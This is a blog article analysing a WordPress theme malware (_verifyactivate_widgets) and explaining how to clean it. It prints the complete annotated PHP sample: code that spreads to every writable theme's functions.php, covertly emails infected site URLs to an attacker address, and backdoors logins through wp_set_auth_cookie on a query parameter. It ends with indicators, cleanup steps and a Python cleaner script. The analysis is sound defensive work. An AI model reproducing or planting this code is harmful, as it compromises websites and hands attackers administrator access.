How to clean the malicious _verifyactivate_widgets code in a WordPress theme
Chen Weiliang recently used the Wordfence Security plugin to scan a website for malicious code, and found malicious virus code hidden in the functions.php file of a WordPress theme.
Malicious code in the WordPress theme functions.php file
The most likely place for "malicious code" to sit in a WordPress installation is the functions.php file inside a theme directory, and it is usually hidden at the very end of that file.
The main problem: the malicious code hooks the admin_head action, so every time an admin page of the blog is loaded it checks whether every theme under the current installation is already infected, and appends itself to any functions.php that is writable and not yet infected.
Then, when the init action runs, it checks whether the current blog has already sent an email to the mailbox livethemas@gmail.com (the address is assembled from string fragments in the code, which is why a simple grep for it finds nothing).
How does it know whether the email has already been sent?
- There is an option named _is_widget_active_ in your wp_options table; once the email has been sent successfully its value is set to 1. You can check it with WP-CLI (wp option get _is_widget_active_) or directly in the database (SELECT option_value FROM wp_options WHERE option_name = '_is_widget_active_').
- If the option is not set, the code sends an email with the home page URL of the current infected blog as both subject and body, then sets the option to 1.
- That is not all, though. Once the option is set, every later init run reaches the bottom of _getprepare_widget, which calls wp_set_auth_cookie($_GET["cperpage"], true) for any visitor who is not logged in. The function name is assembled from pieces ($checkswidgets = "wp_" . "set" . "_" . "auth" . "_" . "cookie"), but the effect is that a request such as ?cperpage=1 hands the visitor the login cookie of user ID 1, normally the first administrator account. The email is how the attacker learns which sites are infected; this cookie call is the backdoor they come back to use.
The malicious virus code looks like this (there are variants, but the core code is the same; the comments have been translated from the original analysis):

```php
<?php
function _verifyactivate_widgets(){
    // __FILE__ is this file, e.g. /path-to-www/wp-content/themes/SimpleDark/functions.php.
    // Find the LAST "<?" tag in the current theme's functions.php and take everything
    // from there to the end of the file: that is the malware's own body, ready to copy.
    $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));
    $output="";
    $allowed="";
    // Strips tags from an empty string; pure decoration.
    $output=strip_tags($output, $allowed);
    // Obtain the absolute path of the themes directory, e.g. /path-to-www/wp-content/themes,
    // in a deliberately obscure way, wrap it in an array and hand it to
    // _get_allwidgets_cont, which returns the absolute path of every theme's functions.php.
    $direst=_get_allwidgets_cont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
    if (is_array($direst)){
        foreach ($direst as $item){
            // Only a writable functions.php can be infected.
            if (is_writable($item)){
                // Signature: the name of the first function in the malicious body.
                $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
                // Read the target functions.php.
                $cont=file_get_contents($item);
                // Signature not found? Then infect it.
                if (stripos($cont,$ftion) === false){
                    // If the target does not end with "?>", one will be appended.
                    $comaar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
                    // Decoy: mimics WP widget code so that the function looks legitimate.
                    $output .= $before . "Not found" . $after;
                    // If the file ends with "?>", keep the content up to and including that tag.
                    if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
                    // Infection: write the original content followed by the malicious body ($widget).
                    $output=rtrim($output, "\n\t");
                    fputs($f=fopen($item,"w+"),$cont . $comaar . "\n" .$widget);fclose($f);
                    // Decoy as well.
                    $output .= ($isshowdots && $ellipsis) ? "..." : "";
                }
            }
        }
    }
    return $output;
}

function _get_allwidgets_cont($wids,$items=array()){
    // Pop one element (a directory path) off $wids.
    $places=array_shift($wids);
    // Strip a trailing slash.
    if(substr($places,-1) == "/"){ $places=substr($places,0,-1); }
    // Not an existing directory: give up.
    if(!file_exists($places) || !is_dir($places)){
        return false;
    }elseif(is_readable($places)){
        // Walk the directory.
        $elems=scandir($places);
        foreach ($elems as $elem){
            if ($elem != "." && $elem != ".."){
                // Subdirectory: queue it in $wids.
                if (is_dir($places . "/" . $elem)){
                    $wids[]=$places . "/" . $elem;
                } elseif (is_file($places . "/" . $elem)&& $elem == substr(__FILE__,-13)){
                    // A file whose name equals the last 13 characters of __FILE__, i.e.
                    // "functions.php": exactly what it is looking for; save it in $items.
                    $items[]=$places . "/" . $elem;
                }
            }
        }
    }else{
        return false;
    }
    // More directories queued? Recurse.
    if (sizeof($wids) > 0){
        return _get_allwidgets_cont($wids,$items);
    } else {
        // Done: return the absolute paths of all functions.php files found.
        return $items;
    }
}

// Three compatibility shims for old PHP versions.
if(!function_exists("stripos")){
    function stripos( $str, $needle, $offset = 0 ){
        return strpos( strtolower( $str ), strtolower( $needle ), $offset );
    }
}
if(!function_exists("strripos")){
    function strripos( $haystack, $needle, $offset = 0 ) {
        if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
        if( $offset < 0 ){
            $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
        } else{
            $temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );
        }
        if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
        $pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );
        return $pos;
    }
}
if(!function_exists("scandir")){
    function scandir($dir,$listDirectories=false, $skipDots=true) {
        $dirArray = array();
        if ($handle = opendir($dir)) {
            while (false !== ($file = readdir($handle))) {
                if (($file != "." && $file != "..") || $skipDots == true) {
                    if($listDirectories == false) { if(is_dir($file)) { continue; } }
                    array_push($dirArray,basename($file));
                }
            }
            closedir($handle);
        }
        return $dirArray;
    }
}

// Hooked to admin_head: on every admin page load, find and infect each theme's functions.php.
add_action("admin_head", "_verifyactivate_widgets");

function _getprepare_widget(){
    if(!isset($text_length)) $text_length=120;
    if(!isset($check)) $check="cookie";
    if(!isset($tagsallowed)) $tagsallowed="<a>";
    if(!isset($filter)) $filter="none";
    if(!isset($coma)) $coma="";
    if(!isset($home_filter)) $home_filter=get_option("home");
    if(!isset($pref_filters)) $pref_filters="wp_";
    if(!isset($is_use_more_link)) $is_use_more_link=1;
    if(!isset($com_type)) $com_type="";
    // Attacker-controlled: a user ID taken straight from the query string.
    if(!isset($cpages)) $cpages=$_GET["cperpage"];
    if(!isset($post_auth_comments)) $post_auth_comments="";
    if(!isset($com_is_approved)) $com_is_approved="";
    if(!isset($post_auth)) $post_auth="auth";
    if(!isset($link_text_more)) $link_text_more="(more...)";
    if(!isset($widget_yes)) $widget_yes=get_option("_is_widget_active_");
    // Assembles the string "wp_set_auth_cookie".
    if(!isset($checkswidgets)) $checkswidgets=$pref_filters."set"."_".$post_auth."_".$check;
    if(!isset($link_text_more_ditails)) $link_text_more_ditails="(details...)";
    if(!isset($contentmore)) $contentmore="ma".$coma."il";
    if(!isset($for_more)) $for_more=1;
    if(!isset($fakeit)) $fakeit=1;
    if(!isset($sql)) $sql="";
    // An empty _is_widget_active_ option means this blog has not been reported yet.
    if (!$widget_yes) :
        global $wpdb, $post;
        // Decoy query that is never executed (note the variable is $sq1, digit one).
        // Its only purpose is to carry the address livethemas@gmail.com in split-up pieces;
        // no post_author will ever match it.
        $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$coma."vethe".$com_type."mas".$coma."@".$com_is_approved."gm".$post_auth_comments."ail".$coma.".".$coma."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
        if (!empty($post->post_password)) {
            if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
                if(is_feed()) {
                    $output=__("There is no excerpt because this is a protected post.");
                } else {
                    $output=get_the_password_form();
                }
            }
        }
        if(!isset($fixed_tags)) $fixed_tags=1;
        if(!isset($filters)) $filters=$home_filter;
        // Assembles the string "wp_mail".
        if(!isset($gettextcomments)) $gettextcomments=$pref_filters.$contentmore;
        if(!isset($tag_aditional)) $tag_aditional="div";
        // Extracts the 20 characters "livethemas@gmail.com" from the decoy query.
        if(!isset($sh_cont)) $sh_cont=substr($sq1, stripos($sq1, "live"), 20);#
        if(!isset($more_text_link)) $more_text_link="Continue reading this entry";
        if(!isset($isshowdots)) $isshowdots=1;
        // $sql is still the empty string: nothing is queried here.
        $comments=$wpdb->get_results($sql);
        if($fakeit == 2) { $text=$post->post_content; }
        elseif($fakeit == 1) { $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt; }
        else { $text=$post->post_excerpt; }
        // The call_user_func_array() embedded in this concatenation is
        // wp_mail("livethemas@gmail.com", <blog home URL>, <blog home URL>): the report
        // email is sent right here, while $sq1 is being built. The SQL around it is never run.
        $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($gettextcomments, array($sh_cont, $home_filter, $filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
        // Excerpt logic copied from a widget, purely as camouflage (the two "more-" ids
        // do not even match).
        if($text_length < 0) {
            $output=$text;
        } else {
            if(!$no_more && strpos($text, "<span id=\"more-5265\"></span>")) {
                $text=explode("<span id=\"more-5675\"></span>", $text, 2);
                $l=count($text[0]);
                $more_link=1;
                // $sql is still empty; this queries nothing.
                $comments=$wpdb->get_results($sql);
            } else {
                $text=explode(" ", $text);
                if(count($text) > $text_length) {
                    $l=$text_length;
                    $ellipsis=1;
                } else {
                    $l=count($text);
                    $link_text_more="";
                    $ellipsis=0;
                }
            }
            for ($i=0; $i<$l; $i++) $output .= $text[$i] . " ";
        }
        // Mark this blog as reported.
        update_option("_is_widget_active_", 1);
        if("all" != $tagsallowed) {
            $output=strip_tags($output, $tagsallowed);
            return $output;
        }
    endif;
    $output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($fixed_tags) ? balanceTags($output, true) : $output;
    $output .= ($isshowdots && $ellipsis) ? "..." : "";
    // $filter is "none": another decoy.
    $output=apply_filters($filter, $output);
    switch($tag_aditional) {
        case("div") : $tag="div"; break;
        case("span") : $tag="span"; break;
        case("p") : $tag="p"; break;
        default : $tag="span";
    }
    // $checkswidgets is wp_set_auth_cookie. For a visitor who is not logged in this runs
    // wp_set_auth_cookie($_GET["cperpage"], true): the visitor names a user ID in the
    // query string and receives that user's login cookie. This is the backdoor.
    if ($is_use_more_link ) {
        if($for_more) {
            $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_text_link . "\">" . $link_text_more = !is_user_logged_in() && @call_user_func_array($checkswidgets,array($cpages, true)) ? $link_text_more : "" . "</a></" . $tag . ">" . "\n";
        } else {
            $output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_text_link . "\">" . $link_text_more . "</a></" . $tag . ">" . "\n";
        }
    }
    return $output;
}

// This is where the damage is done; the infection above is only the "warm-up".
add_action("init", "_getprepare_widget");

// Decoy function with no malicious behaviour; it only makes the block look like a widget.
function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
    global $wpdb;
    $request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
    $request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
    if(!$show_pass_post) $request .= " AND post_password =\"\"";
    if($duration !="") { $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date "; }
    $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
    $posts=$wpdb->get_results($request);
    $output="";
    if ($posts) {
        foreach ($posts as $post) {
            $post_title=stripslashes($post->post_title);
            $comment_count=$post->comment_count;
            $permalink=get_permalink($post->ID);
            $output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
        }
    } else {
        $output .= $before . "None found" . $after;
    }
    return $output;
}
?>
```
What does the malicious code in a WordPress theme look like?
If a Wordfence Security scan reports that your theme's functions.php is infected, open the file and look for markers such as these:
- function _verifyactivate_widgets (or its variant name _checkactive_widgets)
- function _get_allwidgets_cont
- function _getprepare_widget
- function __popular_posts
- function stripos, function strripos, function scandir (compatibility shims for old PHP; on their own these are not proof of infection, only together with the names above)
- add_action("admin_head", "_verifyactivate_widgets"); or add_action("admin_head", "_checkactive_widgets");
- add_action("init", "_getprepare_widget");
- an option named _is_widget_active_ in the wp_options table
- Each of these is an indicator on its own: if any of the above appears in your functions.php, you have most likely been hit.
- The function definitions together with the two add_action() calls are the malicious part; the stripos/strripos/scandir shims and __popular_posts are camouflage that makes the block look like a "prepare widgets" helper.
How to remove the malicious virus code from a WordPress theme's functions.php?
Cleaning is easy in principle: find the code matching the sample above in the theme's functions.php and delete it. The catch is that once one theme is infected, every theme in the themes directory gets infected, so cleaning only the active theme does not work: the code reappears right after you remove it.
The solution is to remove the malicious code from one WordPress theme, set that functions.php to permission 444, and then clean the remaining themes. Re-infection is triggered by the admin_head hook, so do the editing over SFTP or a shell and do not load any wp-admin page until every theme is clean; deleting unused themes outright also removes places for the code to hide. Afterwards delete the _is_widget_active_ option from wp_options.
As for whether the 444 permission on functions.php needs to be changed back later, the general advice is that 444 is reasonably safe and can be relaxed when needed, for example before a theme update.
Because the backdoor hands out login cookies for any user ID named in the query string, also reset the administrator passwords and rotate the secret keys and salts in wp-config.php after cleaning, so that any cookies the attacker already obtained stop working, and review the user list for administrator accounts you did not create.
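Putting the detection markers and the cleaning steps above into a single pass, here is an added example written for this page (it is not code from the article, from Wordfence or from WordPress). It assumes the malware keeps the structure shown in the sample: a copy of itself appended after the target file's closing tag, beginning with a PHP open tag and containing one of the listed function names. The two theme files it builds are constructed here purely for demonstration; pass a real wp-content/themes path as the first argument to run it against a site, after taking a backup.

```python
"""Find and strip the _verifyactivate_widgets infection from every theme's
functions.php below a themes directory, then lock the files to mode 444.
Illustrative code for this page; not Wordfence's or WordPress's own tooling."""
import os
import re
import stat
import sys
import tempfile

# Names that identify the malicious block. _checkactive_widgets is the variant
# name listed on this page; the others appear in the sample above.
INDICATORS = (
    "_verifyactivate_widgets",
    "_checkactive_widgets",
    "_get_allwidgets_cont",
    "_getprepare_widget",
    "_is_widget_active_",
)
OPEN_TAG = re.compile(r"<\?(?:php\b)?", re.IGNORECASE)


def find_infection(src):
    """Offset at which the malicious block starts, or None if the file is clean.

    The malware copies itself from the last '<?' tag of the source file and
    appends that copy after the target's closing '?>', so the block begins at
    the last PHP open tag that precedes the first indicator hit.
    """
    hits = [src.find(name) for name in INDICATORS if name in src]
    if not hits:
        return None
    first = min(hits)
    tags = [m.start() for m in OPEN_TAG.finditer(src, 0, first)]
    return tags[-1] if tags else 0


def clean_source(src):
    """Return (cleaned_source, was_infected). A trailing '?>' that the malware
    added to a file lacking one is left in place; it is harmless in PHP."""
    start = find_infection(src)
    if start is None:
        return src, False
    return src[:start].rstrip() + "\n", True


def clean_theme_dir(themes_dir, lock=True):
    """Clean every functions.php below themes_dir in one pass (no admin page is
    loaded in between, so nothing can re-infect an already cleaned file) and,
    by default, chmod the files to 444 as the article recommends.
    Returns {path: was_infected}."""
    results = {}
    for root, _dirs, files in os.walk(themes_dir):
        if "functions.php" not in files:
            continue
        path = os.path.join(root, "functions.php")
        with open(path, encoding="utf-8", errors="surrogateescape") as fh:
            src = fh.read()
        cleaned, infected = clean_source(src)
        results[path] = infected
        if infected:
            os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)  # make writable for the fix
            with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                fh.write(cleaned)
        if lock:
            os.chmod(path, 0o444)
    return results


# Constructed samples (not real themes): a legitimate functions.php, and the
# same file after the malware appended a shortened copy of itself.
CLEAN_SAMPLE = "<?php\nfunction demo_theme_setup() {\n    add_theme_support('title-tag');\n}\n"
INFECTED_SAMPLE = (
    CLEAN_SAMPLE + "?>\n"
    + "<?php function _verifyactivate_widgets(){ return ''; }\n"
    + 'add_action("admin_head", "_verifyactivate_widgets");\n'
    + 'function _getprepare_widget(){ update_option("_is_widget_active_", 1); }\n'
    + 'add_action("init", "_getprepare_widget"); ?>'
)


def demo():
    """Build a throwaway themes directory with one clean and one infected theme,
    clean it, and return (results keyed by relative path, repaired content, mode)."""
    tmp = tempfile.mkdtemp(prefix="themes-")
    for name, body in (("cleantheme", CLEAN_SAMPLE), ("badtheme", INFECTED_SAMPLE)):
        os.makedirs(os.path.join(tmp, name))
        with open(os.path.join(tmp, name, "functions.php"), "w") as fh:
            fh.write(body)
    results = clean_theme_dir(tmp)
    bad_path = os.path.join(tmp, "badtheme", "functions.php")
    with open(bad_path) as fh:
        repaired = fh.read()
    mode = stat.S_IMODE(os.stat(bad_path).st_mode)
    rel = {os.path.relpath(p, tmp).replace(os.sep, "/"): v for p, v in results.items()}
    return rel, repaired, mode


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, infected in sorted(clean_theme_dir(sys.argv[1]).items()):
            print(("INFECTED, cleaned: " if infected else "clean: ") + path)
    else:
        print(demo())
```

The script deliberately walks every subdirectory, because the malware itself looks for any file named functions.php under the themes tree, not just the one at each theme's top level. Run it with no arguments to see the constructed demo; with a path it prints one line per functions.php found.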
Notes on using the Wordfence Security plugin
We recommend the Wordfence Security WordPress plugin, a WordPress security plugin with an integrated firewall and malware scanner, built and maintained by a large team focused entirely on WordPress security.
Although it has paid modules, the free "Scan" module is enough to check a WordPress site for PHP files containing "malicious code". Expect some false positives (in particular, genuine plugins and the encoded parts of some themes get flagged), but for finding malicious code it gives a lot of result for very little effort.
Note that the plugin is not recommended to be left enabled all the time, because its firewall and protection features put extra load on the database and affect site performance.
Normally, enable the plugin to run a "scan" when needed, and disable it again once the scan is finished, unless there is an ongoing incident that calls for keeping it on.
Chen Weiliang Blog ( https://www.chenweiliang.com/ ) hopes that "How to clean the malicious _verifyactivate_widgets code in a WordPress theme" has been helpful to you.
You are welcome to share the link to this article: https://www.chenweiliang.com/cwl-27554.html